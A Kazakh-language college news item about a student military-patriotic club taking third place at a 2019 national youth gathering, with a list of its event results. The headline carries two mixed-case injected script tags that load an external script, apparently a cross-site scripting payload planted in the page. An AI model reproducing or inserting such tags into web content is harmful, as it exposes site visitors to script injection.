V-Республикалық әскери-патриоттық жастар жиыны<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.06.2019

     2019 жылдың 16-22 маусым аралығында Қарағанды облысы «Спасск» оқу орталығында V-Республикалық әскери-патриоттық жастар жиыны өткізілді.  Әскери-патриоттық жиынға әскери-патриоттық клубтардың тәрбиеленушілері, республикалық (облыстық) мектеп-интернатының тәрбиеленушілері, жоғары оқу орындарының әскери кафедрасының студенттері қатысты. Қарағанды облысының «Спасск» оқу-жаттығу орталығында өткен шараға 17 өңірден келген 600-ден астам жас ұлан қатысып, әскери өнерден сынға түсті. Бұл іс-шараның ашылу салтанатына Мемлекет басшысы – ҚР Қарулы Күштерінің Бас қолбасшысы Қасым-Жомарт Кемелұлы Тоқаев қатысты.

        Аталған дүбірлі жарыста Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің «Айбын» әскери-спорттық клубының мүшелері қатысып, жақсы өнер көрсетті.  

Бескүндік жарыс қорытындысы бойынша:

  • «Айбын дауысы» вокалдық конкурсы – 1 орын;
  • Орынтай Сандуғаш «Бес тас» сайысы бойынша – 2 орын;
  • «Кермеде тартылу» бойынша ер балалар 260 ұпай нәтижесімен – 2 орын;
  • «Әскерилендірілген эстафета» сайысы бойынша – 3 орын;
  • «Әскерилендірілген кросс» сайысы бойынша – 3 орын;

    Жалпы командалық есепте Ақмола облысы намысын қорғаған колледждің «Айбын» әскери-патриоттық клубы  командасы Нұр-сұлтан, Алматы, Шымкент қалалары мен облыстардың ең мықтыларын жинаған V-Республикалық әскери-патриоттық жастар жиынында жүлделі ІІІ орынды иеленді.

Просмотров: 666


Пікір қосу



Деректерді қолтаңбаға қосу